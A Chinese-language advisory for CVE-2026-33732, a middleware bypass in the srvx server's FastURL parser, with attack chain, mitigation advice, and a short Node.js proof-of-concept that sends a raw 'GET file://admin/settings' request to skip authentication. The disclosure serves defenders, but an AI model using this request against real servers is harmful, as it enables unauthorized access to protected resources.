IPBUF安全漏洞报告
English
CVE-2026-33732 CVSS 4.8 中危

CVE-2026-33732 srvx中间件绕过漏洞

披露日期: 2026-03-26

漏洞信息

漏洞编号
CVE-2026-33732
漏洞类型
中间件绕过
CVSS评分
4.8 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
srvx

相关标签

中间件绕过srvx路径解析Node.jsCVE-2026-33732

漏洞概述

srvx是基于web标准的通用服务器。在0.11.13版本之前,其FastURL组件存在路径名解析差异漏洞。当攻击者发送使用非标准方案(如file://)的绝对URI的原始HTTP请求时,可导致Node.js适配器上的中间件被绕过。该漏洞允许攻击者规避安全检查,潜在地访问未授权路径或资源。官方已在0.11.13版本中通过回退到原生URL解析修复了此问题。

技术细节

该漏洞的核心在于srvx项目中FastURL类对特定格式URI的解析逻辑存在缺陷。在受影响版本的Node.js适配器中,FastURL未能正确处理带有非标准协议头(例如file://或其他非http/https协议)的绝对路径请求。由于解析机制的不一致性,当请求包含此类非标准URI时,FastURL生成的路径对象可能与预期不符,导致原本应由中间件(如身份验证、访问控制列表或路由守卫)进行拦截和处理的请求被错误地放行。攻击者无需经过认证,即可构造特殊的恶意HTTP请求,利用这一解析差异直接绕过安全防线,访问受保护的内部接口或静态资源。修复方案是在FastURL构造函数中引入stricter check,对于所有不以/开头的字符串,强制回退到JavaScript原生的URL对象进行解析,从而确保路径处理的一致性并消除安全隐患。

攻击链分析

STEP 1
侦察
攻击者识别目标服务器运行的是srvx服务,且版本低于0.11.13。
STEP 2
构造请求
攻击者编写脚本,发送包含非标准URI方案(如file://)的原始HTTP请求。
STEP 3
触发漏洞
srvx的FastURL组件解析异常,导致请求路径被错误识别,安全中间件被跳过。
STEP 4
达成效果
攻击者成功绕过认证或授权检查,访问受限的后台路径或敏感资源。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2026-33732: srvx Middleware Bypass // Target: srvx < 0.11.13 on Node.js adapter // Description: Sending a raw HTTP request with a non-standard scheme bypasses middleware. const net = require('net'); const host = '127.0.0.1'; const port = 3000; // Default srvx port // Malicious payload using 'file://' scheme to trigger FastURL parsing issue const payload = `GET file://admin/settings HTTP/1.1\r\n` + `Host: ${host}\r\n` + `Connection: close\r\n\r\n`; const client = new net.Socket(); client.connect(port, host, () => { console.log('[*] Sending payload to bypass middleware...'); client.write(payload); }); client.on('data', (data) => { console.log('[+] Response received:'); console.log(data.toString()); client.destroy(); }); client.on('error', (err) => { console.error('[-] Connection error:', err.message); });

影响范围

srvx < 0.11.13

防御指南

临时缓解措施
建议尽快升级至0.11.13或更高版本。如无法立即升级,可在Web服务器前设置反向代理或WAF,配置规则拦截包含非标准协议头(如file://, ftp://等)的异常请求,以临时缓解风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表